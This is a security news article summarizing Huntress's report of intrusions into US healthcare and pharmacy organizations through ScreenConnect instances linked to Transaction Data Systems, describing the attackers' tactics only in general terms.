ScreenConnect Abuse: Hackers Leverage Remote Access Tool for Healthcare Intrusion

Huntress has uncovered a series of cyberattacks targeting several healthcare organizations in the United States. The attacks focus on the ScreenConnect remote access systems, widely used in the healthcare sector.

The central element of these attacks is the exploitation of the infrastructure of Transaction Data Systems (TDS), which provides management and supply systems for pharmacies and operates in all 50 states of the U.S. According to Huntress, the cyber criminals utilized local instances of ScreenConnect embedded in TDS systems to carry out their attacks.

Huntress experts detected malicious activity at endpoints within two distinct medical organizations. They also noted preparatory actions by hackers aimed at expanding the scope of the attack. This includes the installation of additional remote access tools like ScreenConnect or AnyDesk to maintain consistent access to networks.

The methodology of the attacks has drawn particular attention. Researchers found similar tactics, techniques, and procedures (TTPs) in each incident. For example, the downloading of a text.xml file containing C# code, which loads the Meterpreter payload into system memory, evading detection through PowerShell. The use of the print service to launch additional processes was also recorded.

The hackers focused on endpoints operating on Windows Server 2019, belonging to two different organizations – one in the pharmaceutical industry, and another in healthcare. A common link between them was the installation of ScreenConnect.

Currently, it remains unclear whether TDS was compromised or if this is a result of credential leakage. This ambiguity adds to concerns, as uncertainty in such cases can lead to additional risks for medical institutions and their patients.